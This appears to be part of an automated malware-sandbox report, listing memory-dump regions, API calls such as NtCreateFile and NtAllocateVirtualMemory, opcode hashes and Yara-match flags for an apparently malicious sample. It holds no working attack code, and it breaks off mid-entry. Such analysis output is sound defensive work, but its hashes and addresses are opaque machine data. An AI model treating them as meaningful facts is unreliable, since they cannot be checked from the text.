                                                                        • Opcode ID: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                                                        • Instruction ID: 32e431d9c8e9feec3400b22bf84d085514b040ad70633de53850e6bd1b60e77f
                                                                        • Opcode Fuzzy Hash: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                                                        • Instruction Fuzzy Hash: 3190026171110402D102619944246064089E7D1386FD1C012E1454555DC6658963B172
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                                                        • Instruction ID: c2d7d9028324c5158759ad2d6205648baecbe433d53f42b4979b359b6db3e551
                                                                        • Opcode Fuzzy Hash: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                                                        • Instruction Fuzzy Hash: 5D90027165110402D141719944146064089B7D0282FD1C012A0454554EC6958A66BAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                                                        • Instruction ID: b86d707b29d1f9bd5b3b6af05f8f575f954eb52a5483cb00257eece02ade99da
                                                                        • Opcode Fuzzy Hash: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                                                        • Instruction Fuzzy Hash: 589002A1A11240434540B19948144069095B7E13423D1C121A0484560CC6A88865A2A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                                                        • Instruction ID: 481bc3ac8482457a44ff5300cca8494c986d95943795af4396b0e6059fc6ab94
                                                                        • Opcode Fuzzy Hash: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                                                        • Instruction Fuzzy Hash: E390027161154002D1407199845460B9085B7E0342F91C411E0455554CC6558866A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                                                        • Instruction ID: 1d58a6f788e7e8e7f2df70df938bda3ab175aac5bcc7298ebdfa02dcc7f6f9bf
                                                                        • Opcode Fuzzy Hash: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                                                        • Instruction Fuzzy Hash: 1D900271711100529500A6D95814A4A8185A7F0342B91D015A4044554CC59488716161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                                                        • Instruction ID: f4ebbcce3b71f1c3ce96c5bfdbcc87e0e3d354af7f15aa5f64ba00fed9e57fdc
                                                                        • Opcode Fuzzy Hash: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                                                        • Instruction Fuzzy Hash: AC90026165110802D140719984247074086E7D0642F91C011A0054554DC656897576F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                                                        • Instruction ID: 7d5bbe71b81109dfd854227b1dd724b2a0cbdbfb0bf8f20c0ff9d0176ed80e79
                                                                        • Opcode Fuzzy Hash: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                                                        • Instruction Fuzzy Hash: CC900261A1510402D140719954287064095A7D0242F91D011A0054554DC6998A6576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                                                        • Instruction ID: de1f7cd9fe52777eaa019e83d12f1c7863347ec745462e9205b50708eb37b632
                                                                        • Opcode Fuzzy Hash: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                                                        • Instruction Fuzzy Hash: 1A90026161514442D10065995418A064085A7D0246F91D011A1094595DC6758861B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                                                        • Instruction ID: 0d51e2defc50e00ab912fde8ae30904f3dc1a2594eea483dafbb8d36fcef6af7
                                                                        • Opcode Fuzzy Hash: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                                                        • Instruction Fuzzy Hash: DA90027561514442D50065995814A874085A7D0346F91D411A045459CDC6948871B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                                                        • Instruction ID: b7569417c32785d51139d7bbffa54a1fc5f0dec7e72558fe6cff3e8af8528cb5
                                                                        • Opcode Fuzzy Hash: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                                                        • Instruction Fuzzy Hash: E890027161110403D100619955187074085A7D0242F91D411A0454558DD69688617161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                                                        • Instruction ID: 141d5bfbf4eae744b17ea0b0b19bdd9d16f4dfe9d0c216c2f0b29fb1340f3d8a
                                                                        • Opcode Fuzzy Hash: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                                                        • Instruction Fuzzy Hash: B490026161154442D14062994814B0F8185A7E1243FD1C019A4186554CC95588656761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                                                        • Instruction ID: c9021a21876530b93bb3b43616cc4c3fa1e8048902dd96d345e9781aadc4b894
                                                                        • Opcode Fuzzy Hash: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                                                        • Instruction Fuzzy Hash: 9C90027161110842D10061994414B464085A7E0342F91C016A0154654DC655C8617561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                                                        • Instruction ID: 3e0dda3aaa51f3ebd6b044e59335734a548ced5fe445c91a4eb7d6efdbfb1a0f
                                                                        • Opcode Fuzzy Hash: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                                                        • Instruction Fuzzy Hash: 54900271A1510802D150719944247464085A7D0342F91C011A0054654DC7958A6576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                                                        • Instruction ID: 73e9f320d188ea3f79ff49ad5a27ed0dc3927984ada1d5130019ff7f86ba7e94
                                                                        • Opcode Fuzzy Hash: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                                                        • Instruction Fuzzy Hash: 1090027161150402D100619948187474085A7D0343F91C011A5194555EC6A5C8A17571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                                                        • Instruction ID: aa4bd14010cb60707b538f73adfaa91e180c99db87e0ae9808f8f246af9dfdac
                                                                        • Opcode Fuzzy Hash: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                                                        • Instruction Fuzzy Hash: FF90027161514842D14071994414A464095A7D0346F91C011A0094694DD6658D65B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 17387ead08ee10de9573033b96520e48e21befe1425d0ec219086c1de7d52164
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0197FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0197FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                                                        • Instruction ID: be1e839000e0d861026ded0029bb848aa538ec19f7670295436f854e8bb63232
                                                                        • Opcode Fuzzy Hash: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                                                        • Instruction Fuzzy Hash: 56F0C232200601BBEA201A55DC02E23BB6AEF84B30F150614F628561D1DA62B92096F0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00853B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00853B97,007A002E,00000000,00000060,00000000,00000000), ref: 0085820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
                                                                        • Instruction ID: a0e64fab3b6d945347a56d637d44ddbc566fefdf464469044a03c1dff86f7819
                                                                        • Opcode Fuzzy Hash: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
                                                                        • Instruction Fuzzy Hash: 9DF0B2B2200108ABCB08CF88DC94EEB37A9AF8C354F158648FA0DA7240C630E8158BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00853B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00853B97,007A002E,00000000,00000060,00000000,00000000), ref: 0085820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 9c2a7ca21e39169ca699551a1a6b25ae2137b2048557621c9a7e5a976ddcc5f9
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: 75F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(00853D52,5E972F59,FFFFFFFF,00853A11,?,?,00853D52,?,00853A11,FFFFFFFF,5E972F59,00853D52,?,00000000), ref: 008582B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
                                                                        • Instruction ID: b5e47870ce31755d94b847c68e9495f934e5dfe8efd312d4917d81ff40c6c3fa
                                                                        • Opcode Fuzzy Hash: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
                                                                        • Instruction Fuzzy Hash: FDF01DB6114049ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C534EC558BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(00853D52,5E972F59,FFFFFFFF,00853A11,?,?,00853D52,?,00853A11,FFFFFFFF,5E972F59,00853D52,?,00000000), ref: 008582B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: c2ccbc54feda646116fd0f3405a5ce569b1074553c2a1efd6cdfe6d15520f623
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 58F0A9B2200108ABCB14DF89DC81DEB77ADEF8C754F158649BE1D97241DA30E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00842D11,00002000,00003000,00000004), ref: 008583D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: ecbbf20b7762e376a07e70c1345154057b1fd8a9957ccd1d68aaadb580434ef6
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 48F015B2200208ABCB14DF89CC81EAB77ADEF88750F118549FE08A7241CA30F810CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(00853D30,?,?,00853D30,00000000,FFFFFFFF), ref: 00858315
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 5005d15e8e2c1c5f4cb77245d2dc59be131ea5309ab78c7a8310ac5d44bc0f3d
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 18D01275200214ABD710EF98CC45E977BACEF44750F154455BA189B242C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(00853D30,?,?,00853D30,00000000,FFFFFFFF), ref: 00858315
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
                                                                        • Instruction ID: 6cdb8f623bf5b275af70254a13aa902ca54fda791e587b78d91189fbc953186e
                                                                        • Opcode Fuzzy Hash: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
                                                                        • Instruction Fuzzy Hash: E1D02B9D00D2C04FDB10FBB474C10C67F50ED9021431459CFD4A807643C524920993D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00842D11,00002000,00003000,00000004), ref: 008583D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction ID: 51668fb82ed3d2a582c3aac40690bb2013260e999b0ea022e99d498878a4727a
                                                                        • Opcode Fuzzy Hash: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction Fuzzy Hash: 5ED0A7B21491486BC718CFD5ACC0CB377ECEFD8620704858FFD498610AC430A4188F70
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 18e44fb93fa5aad270dd09bdd5ac37fdd89e20a5cfcf5c04006d6cf18098a59a
                                                                        • Instruction ID: aadce4bdd3f5f817a7516d249a1f8c6034048c592c3b0a5a2fceaafd91bc623b
                                                                        • Opcode Fuzzy Hash: 18e44fb93fa5aad270dd09bdd5ac37fdd89e20a5cfcf5c04006d6cf18098a59a
                                                                        • Instruction Fuzzy Hash: FE90027220101413F11161594604707000DD7D0295FA1C456A4455558D9696D963B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d72e104a11e230fe87b100249f5ab2b229152e374a16cf83f71b598d7514316d
                                                                        • Instruction ID: 98bc6acbe272fb7cb37a6b6fe311ff18390c1c44772881093ba71006da1ce278
                                                                        • Opcode Fuzzy Hash: d72e104a11e230fe87b100249f5ab2b229152e374a16cf83f71b598d7514316d
                                                                        • Instruction Fuzzy Hash: 76900262242051527545B1594504507400AE7E02957A1C056A5445950C8566E867E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f435286a3fb61798d12bbf33e204307fe32fe9d0535ec7337129be2dfcfe674a
                                                                        • Instruction ID: 7ccb96052a8e577ecd54fdabe4d7a04c6916db028a26b696e1aa8abb49e6b443
                                                                        • Opcode Fuzzy Hash: f435286a3fb61798d12bbf33e204307fe32fe9d0535ec7337129be2dfcfe674a
                                                                        • Instruction Fuzzy Hash: 689002A234101442F10061594514B060009D7E1355F61C059E5095554D8659DC637166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6b0aff97c4c9b3f98f0bcce6f938c6c9a3e140ed470db5fdea21c6757b77ce2d
                                                                        • Instruction ID: ddfa1c52bb34fc65fc804d54bdc2c26a3c197e0edc91abb86a10d0b363c46d15
                                                                        • Opcode Fuzzy Hash: 6b0aff97c4c9b3f98f0bcce6f938c6c9a3e140ed470db5fdea21c6757b77ce2d
                                                                        • Instruction Fuzzy Hash: D09002A220201003610571594514616400ED7E0255B61C065E5045590DC565D8A27165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2ad6775c6f347c939715251afe82a910c8a99211738c8598f21f45cdc0e783d2
                                                                        • Instruction ID: cf067ec8d43ffa225ae75be1fb288ce4f937f40bcde7671b895e20a56227098f
                                                                        • Opcode Fuzzy Hash: 2ad6775c6f347c939715251afe82a910c8a99211738c8598f21f45cdc0e783d2
                                                                        • Instruction Fuzzy Hash: FD9002B220101402F140715945047460009D7D0355F61C055A9095554E8699DDE676A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9b7f151c88a94521a5ddfe9a77ccacfb5036351df4c5a2868c721f747993b250
                                                                        • Instruction ID: 3f404b11f51bc4e7cec6a007c1e141c7cb6d691c219328dd819bcd708ddea8f4
                                                                        • Opcode Fuzzy Hash: 9b7f151c88a94521a5ddfe9a77ccacfb5036351df4c5a2868c721f747993b250
                                                                        • Instruction Fuzzy Hash: 11900266211010032105A5590704507004AD7D53A5361C065F5046550CD661D8726161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 74b50141b6ab3cccc8a3461fc1172d25337a7e1f2ea8e369f67a8a5c19cbac66
                                                                        • Instruction ID: fef7a43f6d0977fd74744a486f78e2f13c9f22f0ccb5d2d0b4b1d8278c7070f5
                                                                        • Opcode Fuzzy Hash: 74b50141b6ab3cccc8a3461fc1172d25337a7e1f2ea8e369f67a8a5c19cbac66
                                                                        • Instruction Fuzzy Hash: 3990027220109802F1106159850474A0009D7D0355F65C455A8455658D86D5D8A27161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0287054960b03c3fe8705112ad9eb88b0e892ab1ad00cba387e2a439feb7d39f
                                                                        • Instruction ID: 786d7de6acc06c52e10e237edf0bd809e7348a4733dc01d9bfd059b378342738
                                                                        • Opcode Fuzzy Hash: 0287054960b03c3fe8705112ad9eb88b0e892ab1ad00cba387e2a439feb7d39f
                                                                        • Instruction Fuzzy Hash: 4190027220101842F10061594504B460009D7E0355F61C05AA4155654D8655D8627561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
